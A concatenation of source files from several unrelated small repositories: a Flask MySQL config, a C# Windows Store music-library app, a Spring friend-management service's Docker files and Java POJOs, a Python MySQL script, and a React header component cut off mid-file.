app.config['MYSQL_DATABASE_HOST'] = 'TarasKorneev.mysql.pythonanywhere-services.com'
app.config['MYSQL_DATABASE_USER'] = 'TarasKorneev'
app.config['MYSQL_DATABASE_PASSWORD'] = '<PASSWORD>'
app.config['MYSQL_DATABASE_DB'] = 'TarasKorneev$hrdep_db'
mysql = MySQL()
mysql.init_app(app)
<file_sep>/.bash_history
git init
git commit -m "создание первой таблици"
git status
git remote add origin https://github.com/itstep-python05/HR_DEP.git
git push -u origin main
git push -u origin master
exit
|
2a00a5a89a626525cabade8704ef2c132807285a
|
[
"Python",
"Shell"
] | 2
|
Python
|
itstep-python05/HR_DEP
|
0c0068ba49048c9acb80337c02cffe3383542164
|
69fce3277060dd2bdf1b7a4adcc381047631a6eb
|
refs/heads/master
|
<repo_name>kyledws/musicplus<file_sep>/MusicPlus/Models/Playlist.cs
using System.Collections.Generic;
namespace MusicPlus.Models
{
public class Playlist
{
public string Name { get; set; }
public List<Song> Songs { get; private set; }
}
}<file_sep>/MusicPlus/Models/Album.cs
using System.Collections.Generic;
namespace MusicPlus.Models
{
public class Album
{
public string Title { get; set; }
public string Artist { get; set; }
public List<Song> Songs { get; private set; }
public string AlbumArt { get; set; }
public Album(string title, string artist, string albumArt)
{
this.Title = title;
this.Artist = artist;
this.AlbumArt = albumArt;
this.Songs = new List<Song>();
}
}
}
<file_sep>/MusicPlus/Models/Library.cs
using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Collections.Specialized;
using System.IO;
using System.Linq;
using System.Threading.Tasks;
using Windows.Storage;
using Windows.Storage.FileProperties;
using Windows.Storage.Search;
namespace MusicPlus.Models
{
/// <summary>
/// A collection of Songs playable through this App
/// </summary>
public class Library
{
#region Static Public Entities
/// <summary>
/// Formats that Windows.UI.Xaml.Controls.MediaElement supports
/// </summary>
public static readonly string[] PlayableAudioFormats = new string[] { ".mp3", ".m4a", ".aac", ".wma", ".wav" };
#endregion
#region Properties/Fields
/// <summary>
/// Flag indicating if this Library's collections can be updated
/// </summary>
private bool _allowContentsChanged;
/// <summary>
/// Flag indicating if any monitored files have changed while this Library was updating
/// </summary>
private bool _contentsChangedWhileUpdating;
/// <summary>
/// Query that selects files to be added to this Library
/// </summary>
private StorageFileQueryResult _collectionQuery;
/// <summary>
/// Backing store for the LocalFilePath property
/// </summary>
private readonly string _localFilePath;
/// <summary>
/// Path, as a string, to the serialized Library (Read-only)
/// </summary>
public string LocalFilePath { get { return _localFilePath; } }
/// <summary>
/// Backing store for the LastCollectionUpdate property
/// </summary>
private DateTimeOffset _lastCollectionUpdate;
/// <summary>
/// Last time that Library was updated in any way (Read-only)
/// </summary>
public DateTimeOffset LastCollectionUpdate { get { return _lastCollectionUpdate; } }
/// <summary>
/// Backing store for the Songs property
/// </summary>
private ObservableCollection<Song> _songs;
/// <summary>
/// All Songs in this Library (Read-only)
/// </summary>
public ObservableCollection<Song> Songs { get { return _songs; } }
/// <summary>
/// Backing store for the Albums property
/// </summary>
private ObservableCollection<Album> _albums;
/// <summary>
/// All Albums in this Library (Read-only)
/// </summary>
public ObservableCollection<Album> Albums { get { return _albums; } }
/// <summary>
/// Backing store for the Artists property
/// </summary>
private ObservableCollection<Artist> _artists;
/// <summary>
/// All Artists in this Library (Read-only)
/// </summary>
public ObservableCollection<Artist> Artists { get { return _artists; } }
#endregion
#region Constructors
/// <summary>
/// Constructor for a Library with the default settings
/// Default Library : Windows.Storage.KnownFolders.MusicLibrary
/// Default Serialization File: Library.omlib
/// </summary>
private Library() : this(KnownFolders.MusicLibrary, "Library.omlib") { }
/// <summary>
/// Constructor for a Library with a custom folder and the default serializaton file
/// Default Serializaton File: Library.omlib
/// </summary>
/// <param name="folder">Folder where monitored files are stored</param>
private Library(StorageFolder folder) : this(folder, "Library.omlib") { }
/// <summary>
/// Constructor for a Library with a custom folder and serializaton file
/// </summary>
/// <param name="folder">Folder where monitored files are stored</param>
/// <param name="libFileName">Name of the file the Library is serialized to</param>
private Library(StorageFolder folder, string libFileName)
{
_songs = new ObservableCollection<Song>();
_albums = new ObservableCollection<Album>();
_artists = new ObservableCollection<Artist>();
_localFilePath = libFileName;
_lastCollectionUpdate = DateTimeOffset.MinValue; // Last update is the earliest possible date
_allowContentsChanged = true; // Changes can be made to this Library
// By default all supported files and sub-folder files of is Library's target folder will be monitored
var queryOptions = new QueryOptions(CommonFileQuery.DefaultQuery, PlayableAudioFormats);
queryOptions.FolderDepth = FolderDepth.Deep;
queryOptions.SetPropertyPrefetch(PropertyPrefetchOptions.MusicProperties | PropertyPrefetchOptions.BasicProperties, null);
_collectionQuery = folder.CreateFileQueryWithOptions(queryOptions);
// Monitor the target folder and its children for changes
_collectionQuery.ContentsChanged += CollectionQuery_ContentsChanged;
// Monitor the Songs collection for changes
this.Songs.CollectionChanged += Songs_CollectionChanged;
}
#endregion
#region Factories
/// <summary>
/// Returns an empty Library with the default settings
/// </summary>
/// <returns></returns>
public static Library GetEmptyLibrary()
{
return new Library();
}
/// <summary>
/// Returns an empty Library with the default filename and the given folder as its file source
/// </summary>
/// <param name="folder">Source for the Library's files</param>
/// <returns></returns>
public static Library GetEmptyLibrary(StorageFolder folder)
{
return new Library(folder);
}
/// <summary>
/// Returns an empty Library with the given filename and given folder as its file source
/// </summary>
/// <param name="folder">Source for the Library's files</param>
/// <param name="libFileName">Filename for the Library</param>
/// <returns></returns>
public static Library GetEmptyLibrary(StorageFolder folder, string libFileName)
{
return new Library(folder, libFileName);
}
/// <summary>
/// Returns a preloaded Library from the default settings
/// </summary>
/// <returns></returns>
public static async Task<Library> GetLibraryAsync()
{
Library lib = new Library();
await lib.UpdateSongsAsync();
return lib;
}
/// <summary>
/// Returns a preloaded Library with the files from the given folder
/// </summary>
/// <param name="folder">Source for the Library's files</param>
/// <returns></returns>
public static async Task<Library> GetLibraryAsync(StorageFolder folder)
{
Library lib = new Library(folder);
await lib.UpdateSongsAsync();
return lib;
}
/// <summary>
/// Returns a preloaded Library with the files from the given folder, assigns the given
/// filename as the filename for the Library
/// </summary>
/// <param name="folder">Source for the Library's files</param>
/// <param name="libFileName">Filename for the returned Library</param>
/// <returns></returns>
public static async Task<Library> GetLibraryAsync(StorageFolder folder, string libFileName)
{
Library lib = new Library(folder, libFileName);
await lib.UpdateSongsAsync();
return lib;
}
/// <summary>
/// Returns the default Library for this App and returns it
/// </summary>
/// <returns></returns>
public static async Task<Library> OpenLibraryAsync()
{
throw new NotImplementedException();
}
/// <summary>
/// Returns a Library from the files in the given folder
/// </summary>
/// <param name="folder">Folder where the Library files are</param>
/// <returns></returns>
public static async Task<Library> OpenLibraryAsync(StorageFolder folder)
{
throw new NotImplementedException();
}
/// <summary>
/// Returns a Library from the files in the given folder and sets a custom serialization filename
/// </summary>
/// <param name="folder">Folder where the Library files are</param>
/// <param name="libFileName">Custom filename for the Libary</param>
/// <returns></returns>
public static async Task<Library> OpenLibraryAsync(StorageFolder folder, string libFileName)
{
throw new NotImplementedException();
}
/// <summary>
/// Saves the given Library to the default location for this App
/// </summary>
/// <param name="library">Library to be saved</param>
/// <returns></returns>
public static async Task SaveLibraryAsync(Library library)
{
throw new NotImplementedException();
}
#endregion
#region Song Methods
/// <summary>
/// Manually parse this Library's target folder's files and update the Songs collection
/// </summary>
public async Task UpdateSongsAsync()
{
List<string> newSongPaths = new List<string>();
// For all items and children in the target folder
for (uint i = 0; i < await _collectionQuery.GetItemCountAsync(); ++i)
{
// Get a StorageFile for that file
var storageFile = (await _collectionQuery.GetFilesAsync(i, 1))[0];
// Build a new Song
var song = new Song(storageFile.Path);
// If the Song is not in this Library, add it
if (!this.Songs.Contains(song))
{
song.Update(await storageFile.Properties.GetMusicPropertiesAsync());
this.Songs.Add(song);
}
else
{
// Else, find the Song in this Library
song = this.Songs[this.Songs.IndexOf(song)];
// If the file has been updated since the last Library update
// Update the Song properties
if ((await storageFile.GetBasicPropertiesAsync()).DateModified > this.LastCollectionUpdate)
{
song.Update(await storageFile.Properties.GetMusicPropertiesAsync());
}
}
// Cache the path for this Storage file
newSongPaths.Add(storageFile.Path);
}
// Iterate though all of the songs in this Library
// If there are any duplicates (by way of the StorageFile path)
// Remove the Song from this Library
foreach (var song in this.Songs)
{
if (!newSongPaths.Contains(song.FilePath))
{
this.Songs.Remove(song);
}
}
_lastCollectionUpdate = DateTimeOffset.Now;
}
#endregion
#region Albums/Artists Methods
/// <summary>
/// Add a Song to this Library's Album collection
/// </summary>
/// <param name="song">Song to add to the Album collection</param>
private void AddSongToAlbums(Song song)
{
// Look for the Song's album in this Library's Album collection
var album = this.Albums.FirstOrDefault((a) => a.Title == song.Album);
// If the Album wasn't found, create a new Album and add it to the Album collection
if (album == default(Album))
{
album = new Album(song.Album, song.Artist, "");
this.Albums.Add(album);
}
// If the found (or new) Album doesn't contain the given Song
// Add the given Song to the Album
if (!album.Songs.Contains(song))
{
album.Songs.Add(song);
}
}
/// <summary>
/// Add a song to this Library's Artist collection
/// </summary>
/// <param name="song">Song to add to the Artist collection</param>
private void AddSongToArtists(Song song)
{
// Look for the Song's artist in this Library's Artist collection
var artist = this.Artists.FirstOrDefault((a) => a.Name == song.Artist);
// Look for the Song's album in this Library's Album collection
var album = this.Albums.FirstOrDefault((a) => a.Title == song.Album);
// If the Artist wasn't found, create a new Artist and add it to the Artist collection
if (artist == default(Artist))
{
artist = new Artist(song.Artist);
this.Artists.Add(artist);
}
// If the Artist doesn't contain the Album, add it to the Artist's Album collection
if (!artist.Albums.Contains(album))
{
artist.Albums.Add(album);
}
// If the found (or new) Album doesn't contain the given Song
// Add the given Song to the album
if (!album.Songs.Contains(song))
{
album.Songs.Add(song);
}
}
/// <summary>
/// Remove a given Song from this Library's Album collection. Returns true if the
/// song was never in the Album collection or if the song was successfully removed.
/// Returns false otherwise. If the given Song's Album no longer has any Songs
/// the Album is removed from this Library's Album collection.
/// </summary>
/// <param name="song">Song to remove from the Album collection</param>
/// <returns>Status of successful removal of Song</returns>
private bool RemoveSongFromAlbums(Song song)
{
// Removal status
bool removed = false;
// Look for the given Song's Album in this Library's Album collection
var album = this.Albums.FirstOrDefault((a) => a.Title == song.Album);
// If the Album isn't in the Album collection, Song removal was successful
if (album == default(Album))
{
removed = true;
}
else
{
// Else, remove the Song from the Album
removed = album.Songs.Remove(song);
// If the Album's Song count is now 0, remove the Album from the ALbum collection
if (album.Songs.Count == 0)
{
this.Albums.Remove(album);
}
}
return removed;
}
/// <summary>
/// Remove a given song from this Library's Artist collection. Returns true if the
/// song was never in the Artist collection or if the song was successfully removed.
/// Returns false otherwise.
/// </summary>
/// <param name="song">Song to remove from the Album collection</param>
/// <returns>Status of successful removal of Song</returns>
private bool RemoveSongFromArtists(Song song)
{
// Removal status
bool removed = false;
// Look for the given Song's Artist in this Library's Artist collection
var artist = this.Artists.FirstOrDefault((a) => a.Name == song.Artist);
// If the Artist isn't in the Artist collection, Song removal was successful
if (artist == default(Artist))
{
removed = true;
}
else
{
// Else, continue attempt to remove the song
// Look for the given Song's Album in the Artist's Album collection
var album = artist.Albums.FirstOrDefault((a) => a.Title == song.Album);
// If the Album isn't in the Album collection, Song removal was successful
if (album == default(Album))
{
removed = false;
}
else
{
// Else, remove the song from the Album
removed = album.Songs.Remove(song);
// If the Album's Song count is now 0, remove the Album from the Artist's Album collection
if (album.Songs.Count == 0)
{
artist.Albums.Remove(album);
}
// If the Artist's Album count is now 0, remove the Artist from this Library's Artist collection
if (artist.Albums.Count == 0)
{
this.Artists.Remove(artist);
}
}
}
return removed;
}
#endregion
#region Event Handlers
/// <summary>
/// Event handler for this Library's filesystem monitor
/// </summary>
private async void CollectionQuery_ContentsChanged(IStorageQueryResultBase sender, object args)
{
// If this Library is allowed to be updated, begin updating it
// Conditions where this Library can't be updated
// - It is already being updated
if (_allowContentsChanged)
{
// Until this Library no longer needs to be updated...
// - ('Needs' meaning this Library's filesystem monitor has indicated that
// a Song file has been updated which triggered this Event handler to be called.)
// - (_contentChangedWhileUpdating is the flag that indicates a required update.)
do
{
// Flag this Library as having not received a filesystem update
_contentsChangedWhileUpdating = false;
// Disable this Event handler's ability to update this Library
_allowContentsChanged = false;
// Update the Songs in this Library manually
// TODO: Find a way to only update the Songs that need updating
await this.UpdateSongsAsync();
// Re-enable this Event handler's ability to update this Library
_allowContentsChanged = true;
} while (_contentsChangedWhileUpdating);
}
else
{
// Else, flag this Library as needing to be updated
_contentsChangedWhileUpdating = true;
}
}
/// <summary>
/// Event handler for this Library's Song collection change events
/// </summary>
private void Songs_CollectionChanged(object sender, NotifyCollectionChangedEventArgs args)
{
// If Songs were added to this Library's Song collection, add the Song to the appropriate
// Album and Artist in this Library's Album and Artist collections, respectively
if (args.Action == NotifyCollectionChangedAction.Add)
{
foreach (var song in args.NewItems.Cast<Song>())
{
this.AddSongToAlbums(song);
this.AddSongToArtists(song);
}
}
else if (args.Action == NotifyCollectionChangedAction.Remove)
{
// Else, if Songs were removed from this Library's Song collect, remove the Song from
// the appropriate Album and Artist in this Library's Album and Artist collections, respectively
foreach (var song in args.OldItems.Cast<Song>())
{
this.RemoveSongFromAlbums(song);
this.RemoveSongFromArtists(song);
}
}
}
#endregion
#region Serialization Methods
/// <summary>
/// Save a given Library to this App's system provided folder
/// </summary>
/// <param name="lib">The library to be save</param>
/// <param name="localPath">The file path for the saved Library file</param>
public static async Task SaveLibraryToFileAsync(Library lib, string localPath)
{
// Create the Library's save file, or replace the old file if one exists
var libraryFile = await ApplicationData.Current.LocalFolder.CreateFileAsync(localPath, CreationCollisionOption.ReplaceExisting);
// Get the file paths for all the Songs in the give Library
var filePaths = from song in lib.Songs select song.FilePath;
// Write the query selector's
await FileIO.WriteTextAsync(libraryFile, (lib._collectionQuery.Folder.Path + '\n'));
await FileIO.WriteLinesAsync(libraryFile, filePaths);
//TODO: Research and implement a more sophisticated serialization method
// i.e. one that isn't just writing filepaths as plain text to a text file
}
/// <summary>
/// Load a Library with a given name from this App's system provided folder
/// </summary>
/// <param name="localPath"></param>
/// <returns>A Library with all of the Songs retrieved from the given file path</returns>
public static async Task<Library> LoadLibraryFromFileAsync(string localPath)
{
// Create an null variable to store the Libary's StorageFile
StorageFile libraryFile;
// Try to locate the give file path in this App's folder
try
{
libraryFile = await ApplicationData.Current.LocalFolder.GetFileAsync(localPath);
}
catch (Exception e)
{
// If it couldn't be found, throw the custom LibraryFileNotFound Exception
if (e is FileNotFoundException)
{
throw new LibraryFileNotFoundException("Library file does not exist.", e);
}
else
{
// Else, throw whatever exception was thrown to this function
throw e;
}
}
// Read all the songs from
//TODO: Check that the library file is formatted correctly
IList<string> filePaths = await FileIO.ReadLinesAsync(libraryFile);
// Create a null variable to store the Library's storage folder
StorageFolder libraryFolder;
// The first line of the library file should be the path to the Library's folder
// Try to get the Library's folder
try
{
libraryFolder = await StorageFolder.GetFolderFromPathAsync(filePaths[0]);
filePaths.RemoveAt(0);
}
catch (Exception e)
{
// Throw whatever exception is thrown to this function
//TODO: Create a custom Exception to indicate when the error was the given file path
throw e;
}
// Create a new Library
Library lib = new Library(libraryFolder, localPath);
// Add all the Songs from the save file to that Library
foreach (var song in (from file in filePaths select new Song(file)))
{
await song.UpdateAsync();
lib.Songs.Add(song);
}
return lib;
}
#endregion
}
/// <summary>
/// Exception class dedicated to Exception raised when a Library's serialized file can't be found
/// </summary>
public class LibraryFileNotFoundException : Exception
{
public LibraryFileNotFoundException() : base() { }
public LibraryFileNotFoundException(string message) : base(message) { }
public LibraryFileNotFoundException(string message, Exception innerException) : base(message, innerException) { }
}
}
<file_sep>/MusicPlus/AppController.cs
using MusicPlus.Models;
using System;
using System.Threading.Tasks;
using System.Windows.Input;
using Windows.UI.Xaml;
using Windows.UI.Xaml.Controls;
using Windows.UI.Xaml.Media;
namespace MusicPlus
{
public class AppController
{
public ICommand PlayCommand { get; set; }
public ICommand PauseCommand { get; set; }
public ICommand NextCommand { get; set; }
public ICommand PreviousCommand { get; set; }
public ICommand ToggleRepeatCommand { get; set; }
public ICommand ToggleShuffleCommand { get; set; }
public ICommand TogglePlayPauseCommand { get; set; }
public Frame ContainerFrame { get; set; }
public MediaElement AudioPlayer { get; set; }
private DispatcherTimer _audioTimer;
private Library _library;
public Library Library
{
get
{
return _library;
}
}
public AppController ()
{
_library = Library.GetEmptyLibrary();
_audioTimer = new DispatcherTimer();
_audioTimer.Interval = TimeSpan.FromMilliseconds(250);
_audioTimer.Tick += AudioTimer_Tick;
//this.AudioPlayer.CurrentStateChanged += AudioPlayer_CurrentStateChanged;
}
private void Play(object paramater)
{
System.Diagnostics.Debug.WriteLine("Playing Song");
}
private void TogglePlayPause(object paramater)
{
if (this.AudioPlayer.CurrentState == MediaElementState.Playing)
{
this.AudioPlayer.Pause();
}
else
{
this.AudioPlayer.Play();
}
}
private void AudioPlayer_CurrentStateChanged(object sender, RoutedEventArgs e)
{
if (this.AudioPlayer.CurrentState == MediaElementState.Playing)
{
_audioTimer.Start();
}
else
{
_audioTimer.Stop();
}
}
private void AudioTimer_Tick(object sender, object e)
{
throw new NotImplementedException();
}
public async Task InitializeLibraryViewModelAsync()
{
await this.Library.UpdateSongsAsync();
}
}
}
<file_sep>/MusicPlus/Models/Song.cs
using System;
using System.Threading.Tasks;
using Windows.Storage;
using Windows.Storage.FileProperties;
namespace MusicPlus.Models
{
public class Song
{
public string FilePath { get; private set; }
public string Title { get; set; }
public string Artist { get; set; }
public string Album { get; set; }
public string Genre { get; set; }
public uint TrackNumber { get; set; }
public Song(string filePath)
{
this.FilePath = filePath;
}
public Song(string filePath, MusicProperties musicProperties)
{
this.FilePath = filePath;
this.Update(musicProperties);
}
public void Update(MusicProperties musicProperties)
{
this.Title = musicProperties.Title;
this.Artist = musicProperties.Artist;
this.Album = musicProperties.Album;
this.Genre = musicProperties.Genre[0];
this.TrackNumber = musicProperties.TrackNumber;
}
public async Task UpdateAsync()
{
var sf = await StorageFile.GetFileFromPathAsync(this.FilePath);
var mp = await sf.Properties.GetMusicPropertiesAsync();
this.Update(mp);
}
public override bool Equals(object obj)
{
var that = obj as Song;
if (that == null)
return false;
return this.FilePath.Equals(that.FilePath);
}
public override int GetHashCode()
{
return this.FilePath.GetHashCode();
}
}
}
<file_sep>/MusicPlus/AppContainer.xaml.cs
using Windows.UI.Xaml.Controls;
using Windows.UI.Xaml.Navigation;
// The Blank Page item template is documented at http://go.microsoft.com/fwlink/?LinkId=234238
namespace MusicPlus
{
/// <summary>
/// An empty page that can be used on its own or navigated to within a Frame.
/// </summary>
public sealed partial class AppContainer : Page
{
public AppContainer()
{
this.InitializeComponent();
NextButton.DataContext = App.AppCtrl;
}
protected override async void OnNavigatedTo(NavigationEventArgs e)
{
base.OnNavigatedTo(e);
App.AppCtrl.ContainerFrame = this.RootFrame;
App.AppCtrl.AudioPlayer = this.AudioPlayer;
RootFrame.Navigate(typeof(MusicPlus.Views.GridView));
await App.AppCtrl.InitializeLibraryViewModelAsync();
}
}
}
<file_sep>/README.md
musicplus
=========
Music Player - Windows Store app
A complete re-write of my previous Windows Store app [Just Music.](http://apps.microsoft.com/webpdp/app/37540fe4-92e8-4259-994e-03b126512a4b)
|
42119fa87c59247ab7d33fdfd0432e1b802c89e7
|
[
"Markdown",
"C#"
] | 7
|
C#
|
kyledws/musicplus
|
7e092c6fb4bd9291514e3e66953bf24bd2ddada6
|
ef56940a1a4869e53d1b7e349de58211161f00be
|
refs/heads/master
|
<repo_name>sazelkhokhar1/helloworld<file_sep>/credentials.py
import mysql.connector
import os
mydb = mysql.connector.connect(
host="localhost",
port="3306",
user="root",
passwd="<PASSWORD>"
)
print(mydb)
SQL2 = "CREATE TABLE sys.customers (name VARCHAR(255), id VARCHAR(255))"
SQL3 = "INSERT INTO sys.customers VALUES (%s, %s)"
val = ('1','abc')
SQL1 = "SELECT * FROM sys.customers"
cursor = mydb.cursor()
#cursor.execute(SQL1)
cursor.execute(SQL3,val)
mydb.commit()
#records = cursor.fetchall()
|
4fe3b39f77c2c23a6e39022d8dacbdd962a049f6
|
[
"Python"
] | 1
|
Python
|
sazelkhokhar1/helloworld
|
84e137df370fc7c6054873184bbe9cf3c43d3117
|
7d6a197944602b08eecda0788440d42695b5d6e9
|
refs/heads/master
|
<repo_name>rra-am1x-2017/blokcijferapp<file_sep>/src/pages/home/home.ts
import { Component } from '@angular/core';
import { NavController, AlertController } from 'ionic-angular';
import { RapportenProvider } from '../../providers/rapporten/rapporten';
@Component({
selector: 'page-home',
templateUrl: 'home.html'
})
export class HomePage {
public rapporten = [];
constructor(public navCtrl: NavController,
public alertCtrl: AlertController,
public rapportenProvider: RapportenProvider )
{
}
ionViewDidLoad() {
this.rapportenProvider.getRapporten()
.subscribe((data: any[]) => {
this.rapporten = data;
console.log(this.rapporten[1]);
});
}
public changeGradeAlert(rapport, data, grade, vak) {
console.log(data);
let addTodoAlert = this.alertCtrl.create({
title: "<p>Student: " + rapport.firstname + "</p>" +
"<p>Vak: " + vak + " </p>" +
"<p>Periode: " + data.period + "</p>" +
"<p>Cijfer: " + grade + "</p>",
message: "Voer een nieuw cijfer in",
inputs: [
{
type: "number",
name: "nameNewGrade"
}
],
buttons: [
{
text: "Cancel"
},
{
text: "Voeg toe",
handler: (inputData) => {
let newGrade = inputData.nameNewGrade;
this.rapportenProvider.addRapporten(newGrade, data.period, rapport.id, vak);
this.navCtrl.push(HomePage);
}
}
],
cssClass: 'cssCustom'
});
addTodoAlert.present();
}
public gradeCol(grade: number | string): string {
if (typeof(grade) == 'number') {
return grade >= 5.5 ? 'row grade-vol': 'row grade-onv';
}
else if (typeof(grade) == 'string')
if ((grade == 'V') || (grade == 'G')) {
return 'row grade-vol';
} else {
return 'row grade-onv';
}
return 'row';
}
public calculateBlokGrade(data: any): string {
let total : number = 0;
let max : number = 0;
for (let key of Object.keys(data.som)) {
max += data.som[key];
if ( data[key] >= 5.5 )
{
total += data.som[key];
}
}
// console.log((data.cesure["g"]/100) * max);
// console.log((data.cesure["v"]/100) * max);
// return total;
if ( total >= (data.cesure["g"]/100) * max) {
return "G";
} else if ( total >= (data.cesure["v"]/100) * max) {
return "V";
} else {
return "O";
}
}
public age(date){
let now = new Date();
let bday = new Date(date);
if ( (now.getMonth() >= bday.getMonth()) && (now.getDate() >= bday.getDate())) {
return new Date().getFullYear() - new Date(date).getFullYear() ;
} else {
return (new Date().getFullYear() - new Date(date).getFullYear()) - 1;
}
}
// Voor gebruik buiten de class anders never used melding
public refresh() {
this.navCtrl.push(HomePage);
}
}
<file_sep>/src/assets/update.php
<?php
header('Access-Control-Allow-Origin: *');
header('Content-Type: application/json');
include("connect_db.php");
$query = "UPDATE `grades`
SET `" . $_POST["vak"] . "` = '" . $_POST["newGrade"] . "'
WHERE `grades`.`period` = " . $_POST["period"] . "
AND `grades`.`user_id` = " . $_POST["id"] . ";";
$result = mysqli_query($conn, $query);
echo json_encode($_POST);
?><file_sep>/src/assets/connect_db.php
<?php
// **********************login gegevens van localhost***************************
// We gaan contact maken in de code met de mysql database
define("SERVER_NAME", "localhost");
define("USER_NAME", "root");
define("PASSWORD", "");
define("DATABASE_NAME", "am1x-ionic");
// define("SERVER_NAME", "rra-am1x-2017.stateu.org");
// define("USER_NAME", "djmthqwf_rra");
// define("PASSWORD", "<PASSWORD>");
// define("DATABASE_NAME", "djmthqwf_app");
// Met deze functie maken we contact met de mysql server
$conn = mysqli_connect(SERVER_NAME, USER_NAME, PASSWORD, DATABASE_NAME) or die("Hoi");
// *****************************************************************************
?><file_sep>/src/assets/grades.php
<?php
header('Access-Control-Allow-Origin: *');
header('Content-Type: application/json');
include("connect_db.php");
$query = "SELECT `residence`,
`absence`,
`birthday`,
`grades`.`period`,
`users`.`id`,
`user_id`,
`firstname`,
`infix`,
`lastname`,
`photo`,
CONCAT('[', GROUP_CONCAT('{ ',
'\"period\"', ': ', `grades`.`period` , ', ',
'\"web\"', ': ', web, ', ',
'\"game\"', ': ', game, ', ',
'\"slb\"', ': ', slb, ', ',
'\"ned\"', ': ', ned, ', ',
'\"eng\"', ': ', eng, ', ',
'\"rek\"', ': ', rek, ', ',
'\"proj\"', ': ', proj, ', ',
'\"data\"', ': ', data, ', ',
'\"som\"', ': ', `courseweight`.`weight`, ', ',
'\"cesure\"', ': ', `courseweight`.`cesure`, ' }' ORDER BY `grades`.`period`), ']') AS `period`
FROM `grades`, `users`, `courseweight`
WHERE `grades`.`user_id` = `users`.`id`
AND `courseweight`.`period` = `grades`.`period`
GROUP BY `grades`.`user_id`
ORDER BY `grades`.`id` ASC";
// $query = "SELECT `residence`,
// `absence`,
// `birthday`,
// `grades`.`period`,
// `users`.`id`,
// `user_id`,
// `firstname`,
// `infix`,
// `lastname`,
// `photo`,
// CONCAT('[', GROUP_CONCAT('{ ',
// '\"period\"', ': ', period, ', ',
// '\"web\"', ': ', web, ', ',
// '\"game\"', ': ', game, ', ',
// '\"slb\"', ': ', slb, ', ',
// '\"ned\"', ': ', ned, ', ',
// '\"eng\"', ': ', eng, ', ',
// '\"rek\"', ': ', rek, ', ',
// '\"proj\"', ': ', proj, ', ',
// '\"data\"', ': ', datab, ', ',
// '\"blok\"', ': \"', blok, '\" }' ORDER BY `period`), ']') AS `period`
// FROM `grades`, `users`
// WHERE `grades`.`user_id` = `users`.`id`
// GROUP BY `grades`.`user_id`
// ORDER BY `grades`.`id` ASC";
$result = mysqli_query($conn, $query);
$record = mysqli_fetch_all($result, MYSQLI_ASSOC);
for ($i = 0; $i < sizeof($record); $i++) {
$record[$i]["period"] = json_decode($record[$i]["period"]);
}
echo json_encode( $record);
?>
<file_sep>/src/providers/rapporten/rapporten.ts
import { HttpClient, HttpParams, HttpHeaders } from '@angular/common/http';
import { Injectable } from '@angular/core';
@Injectable()
export class RapportenProvider {
private urlUpdate = 'http://blokcijferapp.nl/update.php'
private url = 'http://blokcijferapp.nl/grades.php'
// private url = 'http://rra-am1x-2017.stateu.org/assets/grades.php'
public getRapporten() {
return this.http.get(this.url, {responseType: "json"});
}
constructor(public http: HttpClient) {
}
public addRapporten(newGrade, period, id, vak) {
let params = new HttpParams();
params = params.set('newGrade', newGrade);
params = params.set('period', period);
params = params.set('id', id);
params = params.set('vak', vak);
console.log(params);
let headers = new HttpHeaders();
headers = headers.append('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
this.http.post(this.urlUpdate,
params,
{headers: headers, responseType: "json"}).subscribe(data => {
});
}
}
|
0e7152d3cc9c490af36543cbd95477122a577e60
|
[
"TypeScript",
"PHP"
] | 5
|
TypeScript
|
rra-am1x-2017/blokcijferapp
|
c066907dedaef8077fbfc7db4da310d0a3f93cba
|
2680a0b1bc213d582915510392c3d885b9d8ddb4
|
refs/heads/master
|
<file_sep># Use an official java runtime as a parent image
FROM openjdk:8-jdk
COPY friend.management-1.0-SNAPSHOT.jar /home/friend.management-1.0-SNAPSHOT.jar
# Make port 8080 available to the world outside this container
EXPOSE 8080
# Run friend management when the container launches
CMD ["java", "-jar", "/home/friend.management-1.0-SNAPSHOT.jar"]
<file_sep>version: "3"
services:
web:
image: yaserwang/friend-management:1.0
ports:
- "8080:8080"<file_sep># friend_management
using spring boot to quickly create the service by its auto-configuration
using swagger to generate and expose the documentation of the api
The api can be viewed via below link when starting the service locally
http://localhost:8080/swagger-ui.html
# Note
user need to be added in order to pass the validation.
below are pre-existing users for easy testing
<EMAIL>
<EMAIL>
<EMAIL>
<EMAIL>
<EMAIL><file_sep>package com.sp.pojo;
import com.fasterxml.jackson.annotation.JsonInclude;
import java.util.Objects;
import java.util.Set;
@JsonInclude(JsonInclude.Include.NON_NULL)
public class PublishResponse {
private boolean success;
private Set<String> recipients;
private String message;
private PublishResponse() { }
public PublishResponse(boolean success, Set<String> recipients) {
this(success, recipients, null);
}
public PublishResponse(boolean success, String message) {
this(success, null, message);
}
public PublishResponse(boolean success, Set<String> recipients, String message) {
this.success = success;
this.recipients = recipients;
this.message = message;
}
public boolean isSuccess() {
return success;
}
public Set<String> getRecipients() {
return recipients;
}
public String getMessage() {
return message;
}
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (o == null || getClass() != o.getClass()) return false;
PublishResponse that = (PublishResponse) o;
return success == that.success &&
Objects.equals(recipients, that.recipients) &&
Objects.equals(message, that.message);
}
@Override
public int hashCode() {
return Objects.hash(success, recipients, message);
}
@Override
public String toString() {
return "PublishResponse{" +
"success=" + success +
", recipients=" + recipients +
", message='" + message + '\'' +
'}';
}
}
<file_sep>package com.sp.pojo;
public class SubscribeRequest {
private String requestor;
private String target;
private SubscribeRequest() {
}
public SubscribeRequest(String requestor, String target) {
this.requestor = requestor;
this.target = target;
}
public String getRequestor() {
return requestor;
}
public String getTarget() {
return target;
}
}
|
a4646e4e42cae127ab47962c66b683223b0272db
|
[
"Markdown",
"Java",
"Dockerfile",
"YAML"
] | 5
|
Dockerfile
|
yaserwang/friend_management
|
d24dc0b653e79afbcd5461d0b870670ea57cdf5a
|
1eb26e82a52c518b99cfd743ee265c303609697b
|
refs/heads/master
|
<file_sep>import React from 'react';
import { Link } from 'react-router-dom';
import "./Header.css";
import SearchIcon from '@material-ui/icons/Search';
import LocalMallOutlinedIcon from '@material-ui/icons/LocalMallOutlined';
import { useStateValue } from './StateProvider';
import AccountCircleOutlinedIcon from '@material-ui/icons/AccountCircleOutlined';
function Header() {
const [{ basket }] = useStateValue();
console.log(basket);
return <nav className="header">
<Link to="/">
<img className="header__logo" src="/images/assets/logo.jpg" alt="" />
</Link>
{/* <div className="header__search">
<input type="text" className="header__searchInput" />
<SearchIcon className="header__searchIcon" />
</div> */}
<div className="header__nav">
<div className="header__link1">
<Link to="/Login" className="header__link">
<div className="header__option">
<span className="header__optionLineTwo">WHAT'S NEW</span>
</div>
